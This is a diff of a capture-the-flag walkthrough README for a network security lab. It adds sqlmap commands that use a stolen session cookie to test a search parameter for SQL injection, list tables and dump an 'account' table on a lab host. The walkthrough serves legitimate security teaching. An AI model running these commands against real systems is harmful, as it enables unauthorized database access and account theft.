Aledangelo/NetworkSecurity-CTF/README.md

 If you are using the attacking machine that was provided to you, sqlmap is already installed.
 Otherwise, you can download it here: https://github.com/sqlmapproject/sqlmap

-It is good to check if the "nome" parameter is vulnerable, to do this you need to use the following command:
+To check if the "name" parameter is vulnerable it is necessary to set the session (previously stolen) to allow sqlmap to see the /search page, to do this you need to use the following command:

 **sqlmap -u "http://193.20.1.2:5000/search?nome=mela" -p nome --cookie="session=STOLEN_SESSION"**
 * **-u**: Target Url
 * **-p**: Testable parameter(s)
 * **--cookie**: HTTP cookie header value

+After that we can proceed to inspect the databases:

+**sqlmap -u "http://193.20.1.2:5000/search?nome=mela" -p nome --cookie="session=STOLEN_SESSION" --tables**
+* **--tables**: Enumaret DBMS database tables

+It turns out that there is a database called "networkSecurity" with a table called "account".
+The last step is to see the contents of this table:

+**sqlmap -u "http://193.20.1.2:5000/search?nome=mela" -p nome --cookie="session=STOLEN_SESSION" -D networkSecurity -T account --dump**
+* **-D**: DBMS database to enumerate
+* **-T**: DBMS database table(s) to enumerate
+* **--dump**: Dump DBMS database table entries

 ## Command Injection